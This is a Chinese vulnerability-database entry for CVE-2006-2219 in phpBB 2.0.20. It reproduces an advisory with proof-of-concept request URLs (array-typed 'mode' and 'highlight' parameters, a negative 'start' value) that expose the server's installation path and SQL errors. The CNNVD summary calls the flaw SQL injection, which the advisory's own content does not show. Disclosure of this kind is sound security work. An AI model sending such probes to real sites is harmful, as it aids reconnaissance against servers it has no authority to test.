CVE-2006-2219
CVSS5.0
发布时间 :2007-02-08 12:28:00
修订时间 :2016-10-17 23:39:48
NMCOP    

[原文]phpBB 2.0.20 does not verify user-specified input variable types before being passed to type-dependent functions, which allows remote attackers to obtain sensitive information, as demonstrated by the (1) mode parameter to memberlist.php and the (2) highlight parameter to viewtopic.php that are used as an argument to the htmlspecialchars or urlencode functions, which displays the installation path in the resulting error message.


[CNNVD]phpBBSQL注入漏洞(CNNVD-200702-174)

        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。
        Sql注入漏洞,phpBB将所有输入(INT)都加到了SQL查询的末尾(LIMIT)。如果值小于0或大于-2^32的话查询就会失败。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2219
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2219
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200702-174
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=114695651425026&w=2
(UNKNOWN)  BUGTRAQ  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=bugtraq&m=114731067321710&w=2
(UNKNOWN)  BUGTRAQ  20060508 Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=full-disclosure&m=114685931319903&w=2
(UNKNOWN)  FULLDISC  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://securityreason.com/securityalert/837
(UNKNOWN)  SREASON  837
http://xforce.iss.net/xforce/xfdb/26306
(VENDOR_ADVISORY)  XF  phpbb-multiple-path-disclosure(26306)

- 漏洞信息

phpBBSQL注入漏洞
中危 未知
2007-02-08 00:00:00 2007-02-09 00:00:00
远程  
        phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。
        Sql注入漏洞,phpBB将所有输入(INT)都加到了SQL查询的末尾(LIMIT)。如果值小于0或大于-2^32的话查询就会失败。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.phpbb.com

- 漏洞信息 (F46123)

phpbb2020.txt (PacketStormID:F46123)
2006-05-06 00:00:00
Maksymilian Arciemowicz  securityreason.com
advisory
CVE-2006-2219,CVE-2006-2220
[点击下载]

phpBB version 2.0.20 suffers from full path disclosure and SQL errors.

Source: http://securityreason.com/achievement_securityalert/38

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006

from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars()

...
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) {
		return;
	}
...

As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
	$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
	$mode = 'joined';
}
- ---Code ---

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

Problem appears if display_errors==1, but it exists on many websites. (even at php.net).

- --- 2. Sql Errors ---

Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
- ---Code ---

- ---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
- ---Result ---

- --- 3. How to fix ---
Turn off display_errors or use function like is_string().

- --- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

25567
phpBB htmlspecialchars() Protection Bypass Path Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-05 Unknow
2006-05-05 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站